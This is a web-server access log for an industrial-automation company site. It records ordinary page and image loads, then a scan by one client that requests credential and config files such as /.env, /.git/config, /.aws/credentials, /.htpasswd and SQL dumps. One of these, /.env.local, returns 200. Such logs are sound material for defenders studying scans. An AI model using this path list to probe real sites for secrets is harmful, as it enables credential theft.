[Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:05:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10531] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:14:08:06 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:16:45:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 195.178.110.64] [Length 10553] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 195.178.110.64] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 195.178.110.64] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git-credentials" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/.env.local" [Client 195.178.110.64] [Length 35] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.production" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.npmrc" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/credentials.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.gitconfig" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.pypirc" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.htpasswd" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web.config" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/configuration.php" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/logs/HEAD" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/logs/refs/heads/master" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/logs/refs/heads/main" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/workflows/main.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/workflows/ci.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/workflows/deploy.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.gitlab-ci.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bitbucket-pipelines.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.travis.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-compose.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/composer.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.svn/entries" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.svn/wc.db" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.htaccess" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup.sql" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:16:46:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dump.sql" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:20:31:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/traffic-advice" [Client 66.249.82.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Chrome Privacy Preserving Prefetch Proxy" "-" +[18/Feb/2026:20:31:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 193.186.4.174] [Length 10540] [Gzip 